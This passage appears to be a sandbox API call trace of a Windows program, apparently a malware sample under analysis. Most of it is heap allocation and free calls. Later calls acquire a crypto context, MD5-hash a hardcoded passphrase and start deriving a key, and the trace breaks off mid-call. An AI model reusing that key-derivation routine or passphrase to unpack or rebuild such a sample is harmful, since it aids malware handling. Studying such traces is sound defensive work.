[0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0096.078] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0096.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0096.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.119] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0096.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.120] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.120] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0096.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0096.121] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.121] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0096.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.124] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0096.125] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0096.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.125] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.128] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0096.128] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.128] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca850, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0096.129] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.129] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0096.129] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0096.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa60, 